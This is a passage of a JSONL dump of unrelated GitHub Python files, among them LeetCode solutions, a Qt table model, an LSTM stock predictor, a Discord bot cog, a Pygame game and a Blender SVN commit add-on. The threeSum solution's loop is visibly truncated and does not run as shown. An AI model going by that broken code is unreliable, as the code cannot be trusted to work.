find_the_longest(test)\n","repo_name":"Massprod/leetcode-testing","sub_path":"leetcode_problems/p2609_find_the_longest_balanced_substring_of_a_binary_string.py","file_name":"p2609_find_the_longest_balanced_substring_of_a_binary_string.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13676903582","text":"from PySide2.QtCore import (\n Slot, Qt,\n QAbstractTableModel, QModelIndex,\n QTimer,\n)\n\nfrom ReminderApiProvider import ReminderApiProvider\n\n\nclass CollectionTableModel(QAbstractTableModel):\n __update_timeout = 10_000\n __columns = ['original', 'translation', 'transcription']\n\n def __init__(self, provider, collection, parent=None):\n super().__init__(parent)\n self._api: ReminderApiProvider = provider\n self._collection = collection\n self._objects = list()\n self._timer = QTimer(self)\n\n self._timer.timeout.connect(self.update_model)\n\n self._timer.start(self.__update_timeout)\n self.update_model()\n\n def columnCount(self, parent=QModelIndex()) -> int:\n return len(self.__columns)\n\n def rowCount(self, parent=QModelIndex()) -> int:\n return len(self._objects)\n\n def data(self, index, role=Qt.DisplayRole):\n if role == Qt.DisplayRole:\n row, column = index.row(), index.column()\n\n if row < self.rowCount() and column < self.columnCount():\n return self.__get_display_data(row, column)\n\n return None\n\n def headerData(self, section, orientation, role=Qt.DisplayRole):\n return self.__columns[section] \\\n if orientation == Qt.Horizontal and role == Qt.DisplayRole \\\n else None\n\n def object(self, row):\n return self._objects[row]\n\n @Slot()\n def update_model(self):\n objects = self._api.get_objects(self._collection)\n\n if objects != self._objects:\n self.beginResetModel()\n self._objects = objects\n self.endResetModel()\n\n def __get_display_data(self, row: int, column: int) -> str:\n try:\n return self._objects[row][self.__columns[column]]\n except KeyError:\n return 'NULL'\n","repo_name":"ukolovka/RA_Pyhton","sub_path":"06/src/DesktopApplication/CollectionTableModel.py","file_name":"CollectionTableModel.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31910038317","text":"#\n# @lc app=leetcode.cn id=15 lang=python3\n#\n# [15] 三数之和\n# 双指针法:当我们需要枚举数组中的两个元素时,如果我们发现随着第一个元素的递增,第二个元素是递减的,那么就可以使用双指针的方法\n\n# @lc code=start\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n nums.sort()\n numsLen = len(nums)\n ans = []\n # 枚举 a \n for first in range(numsLen):\n if nums[first]>0:\n return ans\n # 跳过相邻重复元素!\n if first>0 and nums[first]==nums[first-1]:\n continue\n #target: -nums[first] 是定值,在这个定值之上,使用双指针法,由于\n #排序之后,L增大,R必然要减小\n L = first+1\n R = numsLen - 1\n while(L0:\n R=R-1\n else:\n L=L+1\n return ans\n\n\n# @lc code=end\n\n","repo_name":"nbdfls/leetcode","sub_path":"python解题/15.三数之和.py","file_name":"15.三数之和.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33456191092","text":"import os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nkb = tf.keras.backend\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport matplotlib.pyplot as plt\n\nfrom config_20XX import *\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom data_util import *\n\nnp.random.seed(150)\n\n\n\n# Custom loss function to reward correct sign\ndef elliptic_paraboloid_loss(x, y):\n # Compute a rotated elliptic parabaloid.\n r = np.pi / 4\n x_rot = (x * np.cos(r)) + (y * np.sin(r))\n y_rot = (x * -np.sin(r)) + (y * np.cos(r))\n z = ((x_rot**2) / C_DIFF_SIGN) + ((y_rot**2) / C_SAME_SIGN)\n return z\n\n# Load previously saved model\ndef load_model(model_path):\n\treturn tf.keras.models.load_model(model_path)\n\n# Create the model\ndef generate_model(input_shape):\n\t# Model definition\n\tl1 = tf.keras.regularizers.l1\n\tl2 = tf.keras.regularizers.l2\n\tmodel = tf.keras.models.Sequential([\n\t # Shape [batch, time, features] => [batch, time, lstm_units]\n\t tf.keras.layers.LSTM(4, input_shape=input_shape, return_sequences=True, activation='relu'),\n\t tf.keras.layers.LSTM(8, input_shape=input_shape, return_sequences=True, activation='tanh'),\n\t tf.keras.layers.LSTM(16, input_shape=input_shape, return_sequences=True, activation='tanh'),\n\t tf.keras.layers.LSTM(32, input_shape=input_shape, return_sequences=False, activation='relu'),\n\t #tf.keras.layers.Dense(7, input_shape=frame_shape),\n\t tf.keras.layers.Dense(units=256, activation='relu'),\n\t tf.keras.layers.Dropout(0.25),\n\t tf.keras.layers.Dense(units=128, activation='softmax'),\n\t tf.keras.layers.Dense(units=64, activation='relu', kernel_regularizer=l2(0.05)),\n\t tf.keras.layers.Dense(units=32, activation='tanh', kernel_regularizer=l2(0.05)),\n\t tf.keras.layers.Dense(units=16, activation='relu', kernel_regularizer=l2(0.05)),\n\t tf.keras.layers.Dense(units=8, activation='relu', kernel_regularizer=l2(0.05)),\n\t tf.keras.layers.Dense(units=1)\n\t])\n\n\tearly_stopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\n\t patience=PATIENCE,\n\t mode='min')\n\n\tmodel.compile(loss=elliptic_paraboloid_loss,\n\t optimizer=tf.optimizers.Adam(),\n\t metrics=[elliptic_paraboloid_loss])\n\n\treturn model\n\n\n# Train the model (and validate)\ndef train_model(model, train_x, train_y, val_x, val_y):\n\tprint(\"************** TRAINING MODEL **************\")\n\tmodel.fit(train_x, train_y, epochs=MAX_EPOCHS, validation_data=(val_x, val_y))\n\n# Evaluate model\ndef eval_model(stock_ticker, model, test_x, test_y, display=False):\n\ttest_predict = model.predict(test_x)\n\tindices = list(range(len(test_predict)))\n\n\tbuys, sells = [0, 0], [0, 0]\n\tall_trades = [buys, sells]\n\n\tfor i in range(len(test_predict)):\n\t\ttrade_type = int(test_predict[i] <= 0)\n\t\ttrade_result = int(test_predict[i] * test_y[i] >= 0)\n\t\tall_trades[trade_type][trade_result] += 1\n\t \n\tprint(\"\")\n\tprint(\"CORRECT BUYS: %d | WRONG BUYS: %d\" % (buys[1], buys[0]))\n\tprint(\"CORRECT SELLS: %d | WRONG SELLS: %d\" % (sells[1], sells[0]))\n\n\tif display:\n\t\tplt.title(stock_ticker + \" Stock Prediction\")\n\t\tax = plt.axes()\n\t\tax.set_xlabel(\"Time\")\n\t\tax.set_ylabel(\"Price Deviation\")\n\t\tplt.plot(indices, [y[0] for y in test_predict], 'b-', marker='.', label='Predict')\n\t\tplt.plot(indices, [y[0] for y in test_y], 'r-', marker='.', label='Actual')\n\t\tplt.plot(indices, [0 for _ in test_predict], 'k-')\n\t\tplt.legend()\n\t\tplt.show()\n\n\n\n# Run `python3 model.py` to see how it measures up against validation data\nif __name__ == '__main__':\n\n\tif len(sys.argv) < 2:\n\t\tprint('ERROR: Need to specify a ticker')\n\t\texit(1)\n\n\tstock_ticker = sys.argv[1]\n\n\tstock_raw, stock_dat, stock_labels = model_stock_data(stock_ticker)\n\ttrain_x, train_y, test_x, test_y = partition_data(TRAINING_SET_THRESH, stock_dat, stock_labels)\n\ttrain_x, train_y, val_x, val_y = partition_data(TRAINING_SET_THRESH, train_x, train_y)\n\tinput_frame_shape = (stock_dat.shape[1], stock_dat.shape[2])\n\n\tmodel = generate_model(input_frame_shape)\n\ttrain_model(model, train_x, train_y, val_x, val_y)\n\n\teval_model(stock_ticker, model, test_x, test_y, display=True)","repo_name":"Jeffreychen99/20XX_Trader","sub_path":"model_tf.py","file_name":"model_tf.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18598551680","text":"import io\nfrom unittest import TestCase, mock\nfrom brd_package_misaelaguayo.Brd import Brd\n\n\nclass Tests(TestCase):\n def setUp(self):\n self.brd = Brd()\n\n @mock.patch(\"sys.stdout\", new_callable=io.StringIO)\n def assert_stdout(self, n, expected_output, mock_stdout):\n self.brd.runFile(n)\n self.assertEqual(mock_stdout.getvalue(), expected_output)\n\n def test_block_scope(self):\n self.assert_stdout(\n \"examples/block_scope.brd\",\n \"inner a\\nouter b\\nglobal c\\nouter a\\nouter b\\nglobal c\\nglobal a\\nglobal b\\nglobal c\\n\",\n )\n\n def test_printing(self):\n self.assert_stdout(\n \"examples/printing.brd\",\n \"one\\ntrue\\n3\\n\",\n )\n\n def test_variable_assignment(self):\n self.assert_stdout(\n \"examples/variable_assignment.brd\",\n \"2\\n\",\n )\n\n def test_variables(self):\n self.assert_stdout(\n \"examples/variables.brd\",\n \"3\\n\",\n )\n\n def test_while_stmt(self):\n self.assert_stdout(\n \"examples/while_stmt.brd\",\n \"nil\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n\",\n )\n\n def test_for_stmt(self):\n self.assert_stdout(\n \"examples/for_loop.brd\",\n \"nil\\n1\\n1\\n2\\n3\\n5\\n8\\n13\\n21\\n34\\n55\\n89\\n144\\n233\\n377\\n610\\n987\\n1597\\n2584\\n4181\\n6765\\n\",\n )\n","repo_name":"misaelaguayo/BRD","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1387256490","text":"from typing import List\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n \"\"\"Recursive DFS backtracking.\"\"\"\n answer = []\n\n def dfs(so_far: List[str], incoming: str, remaining: str):\n # If incoming is not palindrome, exit\n if incoming != incoming[-1::-1]:\n return\n # Add new palindromic substring to \"so far\"\n new_so_far = [*so_far, incoming]\n len_remaining = len(remaining)\n # If no strings remain, all substrings are palindromes\n if len_remaining == 0:\n answer.append(new_so_far)\n return\n # Create partitions for remaining part of string.\n for partition in range(1, len_remaining + 1):\n front = remaining[:partition]\n back = remaining[partition:]\n dfs(new_so_far, front, back)\n\n # Top level: split string and perform DFS from there\n for partition in range(1, len(s)+1):\n front = s[:partition]\n back = s[partition:]\n dfs([], front, back)\n\n return answer\n","repo_name":"ArchTangent-study/leetcode","sub_path":"backtracking/palindrome_partitioning/131_palindrome_partitioning_1.py","file_name":"131_palindrome_partitioning_1.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34286029120","text":"from discord.ext import commands\nimport discord\nimport utils.shakespeare as shks\n\nclass TextGenerator(commands.Cog):\n \"\"\"Create random texts based on the chosen artist\"\"\"\n \n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"nome\")\n async def shakespeare_name(self, ctx, arg):\n loop = True\n pedro = \"\"\n try:\n while loop:\n pedro = shks.generate_until_dot_temperature_pedro(f'{arg.upper()}')\n if pedro != \"\":\n loop = False\n em = discord.Embed(color=0x80CEE1)\n em.add_field(\n name=f\"**Nome shakespeariano gerado pela rede:**\",\n value=f'{pedro[:-1]}',\n inline=False\n )\n await ctx.send(embed = em)\n except:\n await ctx.send('Lembre-se de não usar caractéres ausentes nos textos originais de Shakespeare, tais quais acentos e \"ç\".')\n\n @commands.command(name=\"frase\")\n async def shakespeare_phrase(self, ctx, *args):\n message = ' '.join(args) \n try:\n phrase = shks.generate_until_dot_temperature(message)\n em = discord.Embed(color=0x80CEE1)\n em.add_field(\n name=f\"**Frase shakespeariana gerada pela rede:**\",\n value=f'{phrase}',\n inline=False\n )\n await ctx.send(embed = em)\n except:\n await ctx.send('Lembre-se de não usar caractéres ausentes nos textos originais de Shakespeare, tais quais acentos e \"ç\".') \n\nasync def setup(bot):\n await bot.add_cog(TextGenerator(bot))\n","repo_name":"petcomputacaoufrgs/bot-do-pet-old","sub_path":"commands/text-generator.py","file_name":"text-generator.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13913467523","text":"#!/usr/bin/env python\n# coding: utf-8\n#\n# author: Tim Wang\n# date: May, 2014\n# filename: yamlutil.py\n\nimport yaml\n\n\ndef store2yaml(data, ymlfile, coding='utf-8'):\n yaml.safe_dump(data, open(ymlfile, 'wt'),\n indent=4, \n allow_unicode=True,\n encoding=coding,\n )","repo_name":"tim-spac/common_lib","sub_path":"utl/yamlutil.py","file_name":"yamlutil.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39499386377","text":"import queue\r\nfrom threading import Thread\r\nimport tkinter as tk\r\nfrom time import sleep\r\n\r\n\r\nclass Counter(tk.Tk):\r\n def __init__(self, queue, font=\"Courier\", size=1000, foreground=\"green\"):\r\n super().__init__()\r\n self.attributes('-fullscreen', True)\r\n self.queue = queue\r\n self.data = self.queue.get()\r\n self.font = font\r\n self.size = size\r\n self.foreground = foreground\r\n self.l = tk.Label(self, text=self.data)\r\n self.l.config(font=(self.font, self.size), fg=self.foreground)\r\n self.l.pack()\r\n \r\n def getNumber(self):\r\n self.data = self.queue.get()\r\n print(self.data)\r\n self.l.configure(text=self.data)\r\n self.l.after(500, self.getNumber)\r\n \r\n \r\nclass ThreadCounter(Thread):\r\n def __init__(self, queue):\r\n super().__init__()\r\n self.queue = queue\r\n\r\n def run(self):\r\n self.root = Counter(self.queue) # create my tkinter object\r\n self.root.after(500, self.root.getNumber) # Find value in the main thread\r\n self.root.mainloop()\r\n \r\nq = queue.Queue()\r\ncnt = 0\r\nq.put(cnt)\r\nthreadCounter = ThreadCounter(q)\r\nthreadCounter.start()\r\nwhile True:\r\n sleep(2)\r\n cnt += 1\r\n q.put(cnt)","repo_name":"Hyderman/Counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69893455610","text":"import os\r\nimport time\r\nsteps = input(\"How many steps? \")\r\n\r\nnumber = int(steps) \r\ntop = (\"__\")\r\ndown = number\r\n\r\nprint(top) \r\nfor num in range(1,number):\r\n \r\n kun = \"%s|_\" % (' ' * num *2)\r\n print(kun)\r\n time.sleep(0.08)\r\n \r\nprint((down *(\"__\")) + \"|\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n ","repo_name":"TomasBalbinder/Projekty","sub_path":"schody.py","file_name":"schody.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11858823929","text":"import numpy as np\nimport reservoir as res\nimport toolbox as tb\nimport sys\n\n\ntransient = 1000 # first transient iterations won't be recorded\nskip = 0\n\nsize = 160\nscale = 16\nlength = 10000000\n\nmax_init = 100\n\ntake = int(sys.argv[1])\n\nnp.random.seed(take)\nrndweight = tb.rndWeights(size) # first command to use rnd to keep track\nmaxAbsEigVal = tb.findMaxAbsEigVal(rndweight)\nweight = (scale * rndweight) / maxAbsEigVal\n\nfile = open(\"./data/output/160-16-9/\" + str(take) + \".txt\", \"w+\")\n\nnp.random.seed(100101)\nfor initid in range(max_init):\n print(\"take:\", take, \"initid:\", initid)\n state = tb.unitState(size) * 0.5\n\n r = res.Reservoir(size, weight, state)\n r.run(transient, mode=\"transient\")\n r.run(length, mode=\"extract\", skip=skip)\n\n ostr = \"\".join(r.output)\n file.write(ostr)\n\nfile.close()\n","repo_name":"alkim-akgun/A-Pseudo-Random-Number-Generator-based-on-the-Chaotic-Reservoir-of-an-Echo-State-Network--BSc-Thesis","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"25698701769","text":"import sys, pygame, random\nfrom ww import *\npygame.init()\n\nww=Stage(20, 20, 24)\nww.set_player(KeyboardPlayer(\"icons/face-cool-24.png\", ww))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 3, 4))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 4, 4))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 5, 4))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 7, 9))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 8, 9))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 9, 9))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 9, 10))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 9, 11))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 15, 15))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 15, 16))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 15, 17))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 15, 18))\nww.add_actor(Monster(\"icons/face-devil-grin-24.png\", ww, 0, 3, 1))\nww.add_actor(Monster(\"icons/face-devil-grin-24.png\", ww, 7, 4, 5))\nww.add_actor(Monster(\"icons/face-devil-grin-24.png\", ww, 4, 10, 3))\nww.add_actor(Monster(\"icons/face-devil-grin-24.png\", ww, 5, 20, 2))\n\n# YOUR COMMENT GOES HERE. BRIEFLY DESCRIBE WHAT THE FOLLOWING LOOP DOES.\n# This while loop is for adding random number of boxes into the stage.\n'''\n\n'''\nnum_boxes=0\nwhile num_boxes<100:\n x=random.randrange(ww.get_width())\n y=random.randrange(ww.get_height())\n if ww.get_actor(x,y) is None:\n ww.add_actor(Box(\"icons/emblem-package-2-24.png\", ww, x, y))\n num_boxes+=1\n\nnum_sticky = 0\nwhile num_sticky < 5:\n x=random.randrange(ww.get_width())\n y=random.randrange(ww.get_height())\n if ww.get_actor(x,y) is None:\n ww.add_actor(StickyBox(\"icons/sticky_box.png\", ww, x, y))\n num_sticky += 1\n\n\n \n# YOUR COMMENT GOES HERE. BRIEFLY DESCRIBE WHAT THE FOLLOWING LOOP DOES.\n#This while loop is for every 100 millisecond, it will receive and respond to a command.\nwhile True:\n pygame.time.wait(100)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n ww.player_event(event.key)\n ww.step()\n ww.draw()\n","repo_name":"xxcocoymlxx/Study-Notes","sub_path":"CSC108/a3/wwgame.py","file_name":"wwgame.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"11912311888","text":"# 오늘 수업에 많은 학생들이 참여했습니다. 단 한 명의 학생을 제외하고는 모든 학생이 출석했습니다.\n# 모든 학생의 이름이 담긴 배열과 출석한 학생들의 배열이 주어질 때, 출석하지 않은 학생의 이름을 반환하시오.\n\n\nall_students = [\"나연\", \"정연\", \"모모\", \"사나\", \"지효\", \"미나\", \"다현\", \"채영\", \"쯔위\"]\npresent_students = [\"정연\", \"모모\", \"채영\", \"쯔위\", \"사나\", \"나연\", \"미나\", \"다현\"]\n\n\ndef get_absent_student(all_array, present_array):\n dict = {}\n for key in all_array:\n dict[key] = True # 키가 중요한거니까 아무 값이나 넣어도 상관 없음\n\n for key in present_array: # dict에서 key 를 하나씩 없앰\n del dict[key]\n\n for key in dict.keys():\n return key # 한 명 밖에 없으니 key 중에 하나를 바로 반환\n\n\nprint(get_absent_student(all_students, present_students))","repo_name":"NayoungBae/algorithm","sub_path":"week_3/11_get_absent_student.py","file_name":"11_get_absent_student.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40200680188","text":"\"This file defines the relevent geometric models Forward & inverse Kinematics and Dynamics \"\n\n# in the following\nimport numpy as np\nfrom numpy import linalg as LA\nimport math\n\nclass Quaternion:\n\n def creat_quaternion(self,w,vector):#creat quaternion\n x, y, z = vector\n return np.array([w,x,y,z])\n\n def rotation_in_quaternion(self,angle,rotation_axis):\n #A rotation about the unit vector n^ by an angle, computed using the quaternion \n\n rotation_axis=LA.norm(rotation_axis) #in case that rotation_axis is not in unit size\n qw=math.cos(0.5*angle)\n q =math.sin(0.5*angle)*rotation_axis\n qx=q[0]\n qy=q[1]\n qz=q[2]\n return np.array([qx,qy,qz,qw])\n\n def quaternion_conjugate(self,quaternion):#q*\n w, x, y, z = quaternion\n return np.array([w,-x,-y,-z])\n\n def quaternion_inverse(self,quaternion):#q^-1\n return self.quaternion_conjugate(quaternion)/(math.pow(LA.norm(quaternion),2))\n\n def quaternion_multiply(self,quaternion1, quaternion0):#q1*q2\n w0, x0, y0, z0 = quaternion0\n w1, x1, y1, z1 = quaternion1\n\n return np.array([-x1 * x0 - y1 * y0 - z1 * z0 + w1 * w0,\n x1 * w0 + y1 * z0 - z1 * y0 + w1 * x0,\n -x1 * z0 + y1 * w0 + z1 * x0 + w1 * y0,\n x1 * y0 - y1 * x0 + z1 * w0 + w1 * z0], dtype=np.float64)\n\n def quaternion_2_rotation_matrix(self,quaternion):\n #q (1x4) -> R (3x3)\n\n # Extract the values from quaternion\n q0, q1, q2, q3 = quaternion\n \n # First row of the rotation matrix\n r00 = 2 * (q0 * q0 + q1 * q1) - 1\n r01 = 2 * (q1 * q2 - q0 * q3)\n r02 = 2 * (q1 * q3 + q0 * q2)\n \n # Second row of the rotation matrix\n r10 = 2 * (q1 * q2 + q0 * q3)\n r11 = 2 * (q0 * q0 + q2 * q2) - 1\n r12 = 2 * (q2 * q3 - q0 * q1)\n \n # Third row of the rotation matrix\n r20 = 2 * (q1 * q3 - q0 * q2)\n r21 = 2 * (q2 * q3 + q0 * q1)\n r22 = 2 * (q0 * q0 + q3 * q3) - 1\n \n # 3x3 rotation matrix\n rot_matrix = np.array([[r00, r01, r02],\n [r10, r11, r12],\n [r20, r21, r22]])\n \n return rot_matrix\n\n def quaternion_update(self,old_quaternion,rotation_in_quaternion):\n #q(t+1)=q(t)*rotation_in_quaternion\n return self.quaternion_multiply(old_quaternion,rotation_in_quaternion)\n\n def vec_rotation_update(self,vector,rotation_quaternion):\n #return rotation vector \n vec_in_quaternion=self.creat_quaternion(0,np.array([vector[0],vector[1],vector[2]]))\n rotation_quaternion_inverse=self.quaternion_inverse(rotation_quaternion)\n rotation_vec_in_quaternion=self.quaternion_multiply(self.quaternion_multiply(rotation_quaternion,vec_in_quaternion),rotation_quaternion_inverse)\n w, vec_new_x, vec_new_y, vec_new_z = rotation_vec_in_quaternion\n return np.array[vec_new_x, vec_new_y, vec_new_z]\n","repo_name":"Lior-Falach/Steps","sub_path":"robot_interface/scripts/Quaternion.py","file_name":"Quaternion.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37437151677","text":"import random\nprint(\"\\n---------------Hey user Welcome to the game Rock Paper Scissors!!---------------\")\nprint(\"---------------0 : ROCK--------------- \\n---------------1 : PAPER--------------- \\n---------------2 : SCISSORS---------------\\n\")\nnum=int(input(\"Hey,- Pick 1 to start the Game \\n - pick 0 to exit game :\"))\ngame={0:\"stone\",1:\"paper\",2:\"scissors\"}\nguss=random.randrange(0,3)\nk=1\ncounter1=0\ncounter2=0\ntotal_game=0\nif num==1:\n while(k<=20):\n num = int(input(\"Pick a number from the given Box :\"))\n if (num <= 2):\n total_game+=1\n print(\"you selected\", game[num])\n print(\"Computer selected\", game[guss])\n if num==0:\n if game[guss]==game[1]:\n print(\"You got 0 point \\n\")\n counter1+=1\n elif game[guss]==game[num]:\n print(\"Try again...!\")\n else:\n print(\"You got 1 Point\")\n counter2 += 1\n elif num==1:\n if game[guss]==game[2]:\n print(\"You got 0 point\")\n counter1 += 1\n elif game[guss]==game[num]:\n print(\"Try again...!\")\n else:\n print(\"You got 1 Point\")\n counter2 += 1\n else:\n if game[guss]==game[0]:\n print(\"You got 0 pont\")\n counter1 += 1\n elif game[guss]==game[num]:\n print(\"Try again...!\")\n else:\n print(\"You got 1 Point\")\n counter2 += 1\n else:\n break\n # print(\"Hey Select any values from 0-2!\")\n # num = int(input(\"Hey,Pick the next number from the given Box :\"))\n k+=1\n print(\"Game ended!!\")\n if counter1>counter2:\n print(\"Opzz!you failed...!!!! \\n---------------Points---------------\\n Computer got\",counter1,\"points.\\n Number of games you have played\",total_game,\"\\n You got\",counter2,\"points.\" )\n elif counter1 List[SVN_file]:\n \"\"\"Return the list of file entries whose status allows committing\"\"\"\n svn_file_list = context.scene.svn.external_files\n committable_statuses = ['modified', 'added', 'deleted']\n files_to_commit = [f for f in svn_file_list if f.status in committable_statuses]\n return files_to_commit\n\n @classmethod\n def poll(cls, context):\n if SVN_COMMIT_THREAD:\n # Don't allow starting a new commit if the previous one isn't finished yet.\n return False\n return cls.get_committable_files(context)\n\n def draw(self, context):\n \"\"\"Draws the boolean toggle list with a list of strings for the button texts.\"\"\"\n layout = self.layout\n files = self.get_committable_files(context)\n layout.label(text=\"These files will be pushed to the remote repository:\")\n svn = context.scene.svn\n row = layout.row()\n row.label(text=\"Filename\")\n row.label(text=\"Status\")\n for idx, file in enumerate(files):\n row = layout.row()\n row.prop(self, \"selection\", index=idx, text=file.name)\n text = file.status_name\n icon = file.status_icon\n if file == svn.current_blend_file and bpy.data.is_dirty:\n text += \" but not saved!\"\n icon = 'ERROR'\n row.alert = True\n row.label(text=text, icon=icon)\n\n row = layout.row()\n row.label(text=\"Commit message:\")\n self.last_idx = 0\n for i in range(type(self).MAX_LINES):\n if getattr(self, f'commit_message_{i}') != \"\":\n self.last_idx = min(i+1, self.MAX_LINES)\n for i in range(0, max(3, self.last_idx+2)):\n # Draw input boxes until the last one that has text, plus two, minimum three.\n # Why two after the last line? Because then you can use Tab to go to the next line.\n # Why at least 3 lines? Because then you can write a one-liner without\n # the OK button jumping away.\n layout.prop(self, f'commit_message_{i}', text=\"\")\n continue\n\n def execute(self, context: bpy.types.Context) -> Set[str]:\n committable_files = self.get_committable_files(context)\n files_to_commit = [f for i, f in enumerate(committable_files) if self.selection[i]]\n\n if not files_to_commit:\n self.report({'ERROR'}, \"No files were selected, nothing to commit.\")\n return {'CANCELLED'}\n\n if len(self.commit_message_0) < 2:\n self.report({'ERROR'}, \"Please describe your changes in the commit message.\")\n return {'CANCELLED'}\n\n commit_message_lines = [getattr(self, f'commit_message_{i}') for i in range(self.last_idx)]\n commit_message = \"\\n\".join(commit_message_lines)\n\n filepaths = [f.svn_path for f in files_to_commit]\n\n global SVN_COMMIT_MSG\n global SVN_COMMIT_FILELIST\n SVN_COMMIT_MSG = commit_message\n SVN_COMMIT_FILELIST = filepaths\n\n self.set_predicted_file_statuses(context, filepaths)\n svn_commit_background_start()\n\n report = f\"{(len(files_to_commit))} files\"\n if len(files_to_commit) == 1:\n report = files_to_commit[0].svn_path\n self.report({'INFO'}, f\"Started committing {report}. See console for when it's finished.\")\n\n return {\"FINISHED\"}\n\n def set_predicted_file_statuses(self, context, filepaths):\n for filepath in filepaths:\n f = context.scene.svn.get_file_by_svn_path(filepath)\n if f.status != 'deleted':\n if f.repos_status == 'none':\n f.status = 'normal'\n else:\n f.status = 'conflicted'\n f.status_predicted_flag = \"COMMIT\"\n\n\ndef async_svn_commit():\n \"\"\"This function should be executed from a separate thread to avoid freezing \n Blender's UI during execute_svn_command().\n \"\"\"\n global SVN_COMMIT_OUTPUT\n global SVN_COMMIT_MSG\n global SVN_COMMIT_FILELIST\n SVN_COMMIT_OUTPUT = \"\"\n filepaths = \" \".join(SVN_COMMIT_FILELIST)\n\n context = bpy.context\n SVN_COMMIT_OUTPUT = execute_svn_command(context, f'svn commit -m \"{SVN_COMMIT_MSG}\" {filepaths}', use_cred=True)\n if type(SVN_COMMIT_OUTPUT) == subprocess.CalledProcessError:\n print(\"Committing failed, try again.\")\n print(SVN_COMMIT_OUTPUT.stderr.decode())\n SVN_COMMIT_OUTPUT = \"\"\n svn_commit_background_stop()\n SVN_COMMIT_MSG = \"\"\n SVN_COMMIT_FILELIST = []\n\n\ndef timer_svn_commit():\n global SVN_COMMIT_OUTPUT\n global SVN_COMMIT_THREAD\n context = bpy.context\n\n if SVN_COMMIT_THREAD and SVN_COMMIT_THREAD.is_alive():\n # Process is still running, so we just gotta wait. Let's try again in 1s.\n return 1.0\n elif SVN_COMMIT_OUTPUT:\n print(SVN_COMMIT_OUTPUT)\n svn_commit_background_stop()\n for f in context.scene.svn.external_files:\n if f.status_predicted_flag == 'COMMIT':\n f.status_predicted_flag = 'SINGLE'\n SVN_COMMIT_OUTPUT = \"\"\n SVN_COMMIT_THREAD = None\n svn_log_background_fetch_start()\n return\n\n SVN_COMMIT_THREAD = threading.Thread(target=async_svn_commit, args=())\n SVN_COMMIT_THREAD.start()\n\n return 1.0\n\n\ndef svn_commit_background_start(_dummy1=None, _dummy2=None):\n if not bpy.app.timers.is_registered(timer_svn_commit):\n bpy.app.timers.register(timer_svn_commit, persistent=True)\n\n\ndef svn_commit_background_stop(_dummy1=None, _dummy2=None):\n if bpy.app.timers.is_registered(timer_svn_commit):\n bpy.app.timers.unregister(timer_svn_commit)\n global SVN_COMMIT_THREAD\n SVN_COMMIT_THREAD = None\n\nregistry = [\n SVN_commit\n]\n","repo_name":"Moykul/blender-studio-tools","sub_path":"blender-svn/blender_svn/svn_commit.py","file_name":"svn_commit.py","file_ext":"py","file_size_in_byte":6925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"15491868055","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 28 23:48:32 2017\n\n@author: farhan\n\"\"\"\n\nimport numpy as np\nimport pandas as 